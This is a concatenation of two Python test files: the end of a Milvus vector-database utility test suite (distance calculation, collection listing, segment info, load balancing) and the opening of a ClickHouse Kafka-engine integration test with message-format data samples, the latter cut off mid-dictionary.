vectors_l = cf.gen_vectors(default_nb, default_dim)
vectors_r = cf.gen_vectors(default_nb, default_dim)
op_l = {"float_vectors": vectors_l}
op_r = {"float_vectors": vectors_r}
log.info("Calculating distance for generated vectors within default metric")
params = {"sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_binary_metric(self, metric_field, metric_binary):
"""
target: test calculate distance with binary vectors
method: calculate distance between binary vectors
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
log.info("Creating vectors for distance calculation")
nb = 10
raw_vectors_l, vectors_l = cf.gen_binary_vectors(nb, default_dim)
raw_vectors_r, vectors_r = cf.gen_binary_vectors(nb, default_dim)
op_l = {"bin_vectors": vectors_l}
op_r = {"bin_vectors": vectors_r}
log.info("Calculating distance for binary vectors")
params = {metric_field: metric_binary}
vectors_l = raw_vectors_l
vectors_r = raw_vectors_r
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric_binary})
@pytest.mark.tags(CaseLabel.L1)
def test_calc_distance_from_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: both left and right vectors are from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
log.info("Creating vectors from collections for distance calculation")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
log.info("Creating vectors for entities")
params = {metric_field: metric, "sqrt": sqrt}
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_collections(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from collections
method: calculated distance between entities from two collections
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
prefix_1 = "utility_distance"
log.info("Creating two collections")
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
collection_w_1, vectors_1, _, insert_ids_1, _ = self.init_collection_general(prefix_1, True, nb)
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors_1[0].loc[:, default_field_name]
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids, "collection": collection_w.name,
"field": default_field_name}
op_r = {"ids": insert_ids_1, "collection": collection_w_1.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance for entities from two collections")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set left vectors as random vectors, right vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = cf.gen_vectors(nb, default_dim)
vectors_r = []
for i in range(middle):
vectors_r.append(vectors[middle + i])
op_l = {"float_vectors": vectors_l}
log.info("Extracting entities from collections for distance calculating")
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"field": default_field_name}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between vectors and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vector_and_collection_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from collection entities
method: set right vectors as random vectors, left vectors from collection
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb)
middle = len(insert_ids) // 2
vectors = vectors[0].loc[:, default_field_name]
vectors_l = vectors[:middle]
vectors_r = cf.gen_vectors(nb, default_dim)
log.info("Extracting entities from collections for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"field": default_field_name}
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
log.info("Calculating distance between right vector and entities")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance from one partition entities
method: both left and right vectors are from partition
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
log.info("Extracting entities from partitions for distance calculating")
vectors_l = vectors[i].loc[:, default_field_name]
vectors_r = vectors[i].loc[:, default_field_name]
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculating distance between entities from one partition")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_from_partitions(self, metric_field, metric, sqrt):
"""
target: test calculated distance between entities from partitions
method: calculate distance between entities from two partitions
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
partitions = collection_w.partitions
middle = len(insert_ids) // 2
params = {metric_field: metric, "sqrt": sqrt}
vectors_l = vectors[0].loc[:, default_field_name]
vectors_r = vectors[1].loc[:, default_field_name]
log.info("Extract entities from two partitions for distance calculating")
op_l = {"ids": insert_ids[:middle], "collection": collection_w.name,
"partition": partitions[0].name, "field": default_field_name}
op_r = {"ids": insert_ids[middle:], "collection": collection_w.name,
"partition": partitions[1].name, "field": default_field_name}
log.info("Calculate distance between entities from two partitions")
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_left_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set left vectors as random vectors, right vectors are entities
expected: distance calculated successfully
"""
log.info("Creating connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_l = cf.gen_vectors(nb // 2, default_dim)
log.info("Extract entities from collection as right vectors")
op_l = {"float_vectors": vectors_l}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
log.info("Calculate distance between vector and entities")
for i in range(len(partitions)):
vectors_r = vectors[i].loc[:, default_field_name]
op_r = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
@pytest.mark.tags(CaseLabel.L2)
def test_calc_distance_right_vectors_and_partition_ids(self, metric_field, metric, sqrt):
"""
target: test calculated distance between vectors and partition entities
method: set right vectors as random vectors, left vectors are entities
expected: distance calculated successfully
"""
log.info("Create connection")
self._connect()
nb = 10
collection_w, vectors, _, insert_ids, _ = self.init_collection_general(prefix, True, nb, partition_num=1)
middle = len(insert_ids) // 2
partitions = collection_w.partitions
vectors_r = cf.gen_vectors(nb // 2, default_dim)
op_r = {"float_vectors": vectors_r}
params = {metric_field: metric, "sqrt": sqrt}
start = 0
end = middle
for i in range(len(partitions)):
vectors_l = vectors[i].loc[:, default_field_name]
log.info("Extract entities from partition %d as left vector" % i)
op_l = {"ids": insert_ids[start:end], "collection": collection_w.name,
"partition": partitions[i].name, "field": default_field_name}
start += middle
end += middle
log.info("Calculate distance between vector and entities from partition %d" % i)
self.utility_wrap.calc_distance(op_l, op_r, params,
check_task=CheckTasks.check_distance,
check_items={"vectors_l": vectors_l,
"vectors_r": vectors_r,
"metric": metric,
"sqrt": sqrt})
class TestUtilityAdvanced(TestcaseBase):
""" Test case of index interface """
@pytest.mark.tags(CaseLabel.L2)
def test_has_collection_multi_collections(self):
"""
target: test has_collection with collection name
method: input collection name created before
expected: True
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
for name in [c_name, c_name_2]:
res, _ = self.utility_wrap.has_collection(name)
assert res is True
@pytest.mark.tags(CaseLabel.L2)
def test_list_collections_multi_collection(self):
"""
target: test list_collections
method: create collection, list_collections
expected: in the result
"""
c_name = cf.gen_unique_str(prefix)
c_name_2 = cf.gen_unique_str(prefix)
self.init_collection_wrap(name=c_name)
self.init_collection_wrap(name=c_name_2)
res, _ = self.utility_wrap.list_collections()
for name in [c_name, c_name_2]:
assert name in res
def test_drop_multi_collection_concurrent(self):
"""
target: test concurrent drop collection
method: multi thread drop one collection
expected: drop successfully
"""
thread_num = 3
threads = []
c_names = []
num = 5
for i in range(thread_num * num):
c_name = cf.gen_unique_str(prefix)
self.init_collection_wrap(c_name)
c_names.append(c_name)
def create_and_drop_collection(names):
for name in names:
assert self.utility_wrap.has_collection(name)[0]
self.utility_wrap.drop_collection(name)
assert not self.utility_wrap.has_collection(name)[0]
for i in range(thread_num):
x = threading.Thread(target=create_and_drop_collection, args=(c_names[i * num:(i + 1) * num],))
threads.append(x)
x.start()
for t in threads:
t.join()
log.debug(self.utility_wrap.list_collections()[0])
@pytest.mark.tags(CaseLabel.L1)
def test_get_query_segment_info_empty_collection(self):
"""
target: test getting query segment info of empty collection
method: init a collection and get query segment info
expected: length of segment is 0
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) == 0
@pytest.mark.tags(CaseLabel.L1)
def test_get_growing_query_segment_info(self):
"""
target: test getting growing query segment info of collection with data
method: init a collection, insert data, load, search, and get query segment info
expected:
1. length of segment is greater than 0
2. the sum num_rows of each segment is equal to num of entities
"""
import random
dim = 128
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
nq = 2
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
collection_w.load()
vectors = [[random.random() for _ in range(dim)] for _ in range(nq)]
collection_w.search(vectors, default_field_name, ct.default_search_params, ct.default_limit)
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.L1)
def test_get_sealed_query_segment_info(self):
"""
target: test getting sealed query segment info of collection with data
method: init a collection, insert data, flush, load, and get query segment info
expected:
1. length of segment is greater than 0
2. the sum num_rows of each segment is equal to num of entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
collection_w.num_entities
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.L1)
def test_get_sealed_query_segment_info_after_create_index(self):
"""
target: test getting sealed query segment info of collection with data
method: init a collection, insert data, flush, create index, load, and get query segment info
expected:
1. length of segment is greater than 0
2. the sum num_rows of each segment is equal to num of entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
collection_w.num_entities
collection_w.create_index(default_field_name, default_index_params)
collection_w.load()
res, _ = self.utility_wrap.get_query_segment_info(c_name)
assert len(res) > 0
segment_ids = []
cnt = 0
for r in res:
log.info(f"segmentID {r.segmentID}: state: {r.state}; num_rows: {r.num_rows} ")
if r.segmentID not in segment_ids:
segment_ids.append(r.segmentID)
cnt += r.num_rows
assert cnt == nb
@pytest.mark.tags(CaseLabel.Loadbalance)
def test_load_balance_normal(self):
"""
target: test load balance of collection
method: init a collection and load balance
expected: sealed_segment_ids is subset of des_sealed_segment_ids
"""
# init a collection
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
ms = MilvusSys()
nb = 3000
df = cf.gen_default_dataframe_data(nb)
collection_w.insert(df)
# get sealed segments
collection_w.num_entities
# get growing segments
collection_w.insert(df)
collection_w.load()
# prepare load balance params
res, _ = self.utility_wrap.get_query_segment_info(c_name)
segment_distribution = cf.get_segment_distribution(res)
all_querynodes = [node["identifier"] for node in ms.query_nodes]
assert len(all_querynodes) > 1
all_querynodes = sorted(all_querynodes,
key=lambda x: len(segment_distribution[x]["sealed"])
if x in segment_distribution else 0, reverse=True)
src_node_id = all_querynodes[0]
des_node_ids = all_querynodes[1:]
sealed_segment_ids = segment_distribution[src_node_id]["sealed"]
# load balance
self.utility_wrap.load_balance(src_node_id, des_node_ids, sealed_segment_ids)
# get segments distribution after load balance
res, _ = self.utility_wrap.get_query_segment_info(c_name)
segment_distribution = cf.get_segment_distribution(res)
des_sealed_segment_ids = []
for des_node_id in des_node_ids:
des_sealed_segment_ids += segment_distribution[des_node_id]["sealed"]
# assert sealed_segment_ids is subset of des_sealed_segment_ids
assert set(sealed_segment_ids).issubset(des_sealed_segment_ids)
|
test.py
|
import os.path as p
import random
import threading
import time
import pytest
import io
from helpers.cluster import ClickHouseCluster
from helpers.test_tools import TSV
from helpers.client import QueryRuntimeException
from helpers.network import PartitionManager
import json
import subprocess
import kafka.errors
from kafka import KafkaAdminClient, KafkaProducer, KafkaConsumer, BrokerConnection
from kafka.admin import NewTopic
from kafka.protocol.admin import DescribeGroupsResponse_v1, DescribeGroupsRequest_v1
from kafka.protocol.group import MemberAssignment
import avro.schema
from confluent.schemaregistry.client import CachedSchemaRegistryClient
from confluent.schemaregistry.serializers.MessageSerializer import MessageSerializer
import socket
from google.protobuf.internal.encoder import _VarintBytes
"""
protoc --version
libprotoc 3.0.0
# to create kafka_pb2.py
protoc --python_out=. kafka.proto
"""
import kafka_pb2
# TODO: add test for run-time offset update in CH, if we manually update it on Kafka side.
# TODO: add test for SELECT LIMIT is working.
cluster = ClickHouseCluster(__file__)
instance = cluster.add_instance('instance',
config_dir='configs',
main_configs=['configs/kafka.xml', 'configs/log_conf.xml', 'configs/kafka_macros.xml' ],
with_kafka=True,
with_zookeeper=True,
clickhouse_path_dir='clickhouse_path')
kafka_id = ''
# Helpers
def check_kafka_is_available():
p = subprocess.Popen(('docker',
'exec',
'-i',
kafka_id,
'/usr/bin/kafka-broker-api-versions',
'--bootstrap-server',
'INSIDE://localhost:9092'),
stdout=subprocess.PIPE)
p.communicate()
return p.returncode == 0
def wait_kafka_is_available(max_retries=50):
retries = 0
while True:
if check_kafka_is_available():
break
else:
retries += 1
if retries > max_retries:
raise "Kafka is not available"
print("Waiting for Kafka to start up")
time.sleep(1)
def kafka_produce(topic, messages, timestamp=None):
producer = KafkaProducer(bootstrap_servers="localhost:9092")
for message in messages:
producer.send(topic=topic, value=message, timestamp_ms=timestamp)
producer.flush()
# print ("Produced {} messages for topic {}".format(len(messages), topic))
def kafka_consume(topic):
consumer = KafkaConsumer(bootstrap_servers="localhost:9092", auto_offset_reset="earliest")
consumer.subscribe(topics=(topic))
for toppar, messages in consumer.poll(5000).items():
if toppar.topic == topic:
for message in messages:
yield message.value
consumer.unsubscribe()
consumer.close()
def kafka_produce_protobuf_messages(topic, start_index, num_messages):
data = ''
for i in range(start_index, start_index + num_messages):
msg = kafka_pb2.KeyValuePair()
msg.key = i
msg.value = str(i)
serialized_msg = msg.SerializeToString()
data = data + _VarintBytes(len(serialized_msg)) + serialized_msg
producer = KafkaProducer(bootstrap_servers="localhost:9092")
producer.send(topic=topic, value=data)
producer.flush()
print("Produced {} messages for topic {}".format(num_messages, topic))
def avro_confluent_message(schema_registry_client, value):
# type: (CachedSchemaRegistryClient, dict) -> str
serializer = MessageSerializer(schema_registry_client)
schema = avro.schema.make_avsc_object({
'name': 'row',
'type': 'record',
'fields': [
{'name': 'id', 'type': 'long'},
{'name': 'blockNo', 'type': 'int'},
{'name': 'val1', 'type': 'string'},
{'name': 'val2', 'type': 'float'},
{'name': 'val3', 'type': 'int'}
]
})
return serializer.encode_record_with_schema('test_subject', schema, value)
@pytest.mark.timeout(180)
def test_kafka_json_as_string(kafka_cluster):
kafka_produce('kafka_json_as_string', ['{"t": 123, "e": {"x": "woof"} }', '', '{"t": 124, "e": {"x": "test"} }', '{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}'])
instance.query('''
CREATE TABLE test.kafka (field String)
ENGINE = Kafka
SETTINGS kafka_broker_list = 'kafka1:19092',
kafka_topic_list = 'kafka_json_as_string',
kafka_group_name = 'kafka_json_as_string',
kafka_format = 'JSONAsString',
kafka_flush_interval_ms=1000;
''')
result = instance.query('SELECT * FROM test.kafka;')
expected = '''\
{"t": 123, "e": {"x": "woof"} }
{"t": 124, "e": {"x": "test"} }
{"F1":"V1","F2":{"F21":"V21","F22":{},"F23":"V23","F24":"2019-12-24T16:28:04"},"F3":"V3"}
'''
assert TSV(result) == TSV(expected)
assert instance.contains_in_log("Parsing of message (topic: kafka_json_as_string, partition: 0, offset: 1) return no rows")
@pytest.mark.timeout(300)
def test_kafka_formats(kafka_cluster):
# data was dumped from clickhouse itself in a following manner
# clickhouse-client --format=Native --query='SELECT toInt64(number) as id, toUInt16( intDiv( id, 65536 ) ) as blockNo, reinterpretAsString(19777) as val1, toFloat32(0.5) as val2, toUInt8(1) as val3 from numbers(100) ORDER BY id' | xxd -ps | tr -d '\n' | sed 's/\(..\)/\\x\1/g'
all_formats = {
## Text formats ##
# dumped with clickhouse-client ... | perl -pe 's/\n/\\n/; s/\t/\\t/g;'
'JSONEachRow' : {
'data_sample' : [
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"1","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"2","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"3","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"4","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"5","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"6","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"7","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"8","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"9","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"10","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"11","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"12","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"13","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"14","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n{"id":"15","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
'{"id":"0","blockNo":0,"val1":"AM","val2":0.5,"val3":1}\n',
],
'supports_empty_value': True,
},
# JSONAsString doesn't fit to that test, and tested separately
'JSONCompactEachRow' : {
'data_sample' : [
'["0", 0, "AM", 0.5, 1]\n',
'["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["0", 0, "AM", 0.5, 1]\n',
],
'supports_empty_value': True,
},
'JSONCompactEachRowWithNamesAndTypes' : {
'data_sample' : [
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["1", 0, "AM", 0.5, 1]\n["2", 0, "AM", 0.5, 1]\n["3", 0, "AM", 0.5, 1]\n["4", 0, "AM", 0.5, 1]\n["5", 0, "AM", 0.5, 1]\n["6", 0, "AM", 0.5, 1]\n["7", 0, "AM", 0.5, 1]\n["8", 0, "AM", 0.5, 1]\n["9", 0, "AM", 0.5, 1]\n["10", 0, "AM", 0.5, 1]\n["11", 0, "AM", 0.5, 1]\n["12", 0, "AM", 0.5, 1]\n["13", 0, "AM", 0.5, 1]\n["14", 0, "AM", 0.5, 1]\n["15", 0, "AM", 0.5, 1]\n',
'["id", "blockNo", "val1", "val2", "val3"]\n["Int64", "UInt16", "String", "Float32", "UInt8"]\n["0", 0, "AM", 0.5, 1]\n',
# ''
# On empty message exception: Cannot parse input: expected '[' at end of stream., Stack trace (when copying this message, always include the lines below):
# /src/IO/ReadHelpers.h:175: DB::assertChar(char, DB::ReadBuffer&) @ 0x15db231a in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/JSONCompactEachRowRowInputFormat.cpp:0: DB::JSONCompactEachRowRowInputFormat::readPrefix() @ 0x1dee6bd6 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
],
},
'TSKV' : {
'data_sample' : [
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=1\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=2\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=3\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=4\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=5\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=6\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=7\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=8\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=9\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=10\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=11\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=12\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=13\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=14\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\nid=15\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
'id=0\tblockNo=0\tval1=AM\tval2=0.5\tval3=1\n',
# ''
# On empty message exception: Unexpected end of stream while reading key name from TSKV format
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:88: DB::readName(DB::ReadBuffer&, StringRef&, std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&) @ 0x1df8c098 in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/TSKVRowInputFormat.cpp:114: DB::TSKVRowInputFormat::readRow(std::__1::vector<COW<DB::IColumn>::mutable_ptr<DB::IColumn>, std::__1::allocator<COW<DB::IColumn>::mutable_ptr<DB::IColumn> > >&, DB::RowReadExtension&) @ 0x1df8ae3e in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:64: DB::IRowInputFormat::generate() @ 0x1de727cf in /usr/bin/clickhouse
],
},
'CSV' : {
'data_sample' : [
'0,0,"AM",0.5,1\n',
'1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'0,0,"AM",0.5,1\n',
],
'supports_empty_value': True,
},
'TSV' : {
'data_sample' : [
'0\t0\tAM\t0.5\t1\n',
'1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
'0\t0\tAM\t0.5\t1\n',
],
'supports_empty_value': True,
},
'CSVWithNames' : {
'data_sample' : [
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n1,0,"AM",0.5,1\n2,0,"AM",0.5,1\n3,0,"AM",0.5,1\n4,0,"AM",0.5,1\n5,0,"AM",0.5,1\n6,0,"AM",0.5,1\n7,0,"AM",0.5,1\n8,0,"AM",0.5,1\n9,0,"AM",0.5,1\n10,0,"AM",0.5,1\n11,0,"AM",0.5,1\n12,0,"AM",0.5,1\n13,0,"AM",0.5,1\n14,0,"AM",0.5,1\n15,0,"AM",0.5,1\n',
'"id","blockNo","val1","val2","val3"\n0,0,"AM",0.5,1\n',
# '',
# On empty message exception happens: Attempt to read after eof
# /src/IO/VarInt.h:122: DB::throwReadAfterEOF() @ 0x15c34487 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:583: void DB::readCSVStringInto<std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> > >(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c961e1 in /usr/bin/clickhouse
# /src/IO/ReadHelpers.cpp:678: DB::readCSVString(std::__1::basic_string<char, std::__1::char_traits<char>, std::__1::allocator<char> >&, DB::ReadBuffer&, DB::FormatSettings::CSV const&) @ 0x15c8dfae in /usr/bin/clickhouse
# /src/Processors/Formats/Impl/CSVRowInputFormat.cpp:170: DB::CSVRowInputFormat::readPrefix() @ 0x1dec46f7 in /usr/bin/clickhouse
# /src/Processors/Formats/IRowInputFormat.cpp:0: DB::IRowInputFormat::generate() @ 0x1de72710 in /usr/bin/clickhouse
# /src/Processors/ISource.cpp:48: DB::ISource::work() @ 0x1dd79737 in /usr/bin/clickhouse
],
},
'Values' : {
'data_sample' : [
"(0,0,'AM',0.5,1)",
"(1,0,'AM',0.5,1),(2,0,'AM',0.5,1),(3,0,'AM',0.5,1),(4,0,'AM',0.5,1),(5,0,'AM',0.5,1),(6,0,'AM',0.5,1),(7,0,'AM',0.5,1),(8,0,'AM',0.5,1),(9,0,'AM',0.5,1),(10,0,'AM',0.5,1),(11,0,'AM',0.5,1),(12,0,'AM',0.5,1),(13,0,'AM',0.5,1),(14,0,'AM',0.5,1),(15,0,'AM',0.5,1)",
"(0,0,'AM',0.5,1)",
],
'supports_empty_value': True,
},
'TSVWithNames' : {
'data_sample' : [
'id\tblockNo\tval1\tval2\tval3\n0\t0\tAM\t0.5\t1\n',
'id\tblockNo\tval1\tval2\tval3\n1\t0\tAM\t0.5\t1\n2\t0\tAM\t0.5\t1\n3\t0\tAM\t0.5\t1\n4\t0\tAM\t0.5\t1\n5\t0\tAM\t0.5\t1\n6\t0\tAM\t0.5\t1\n7\t0\tAM\t0.5\t1\n8\t0\tAM\t0.5\t1\n9\t0\tAM\t0.5\t1\n10\t0\tAM\t0.5\t1\n11\t0\tAM\t0.5\t1\n12\t0\tAM\t0.5\t1\n13\t0\tAM\t0.5\t1\n14\t0\tAM\t0.5\t1\n15\t0\tAM\t0.5\t1\n',
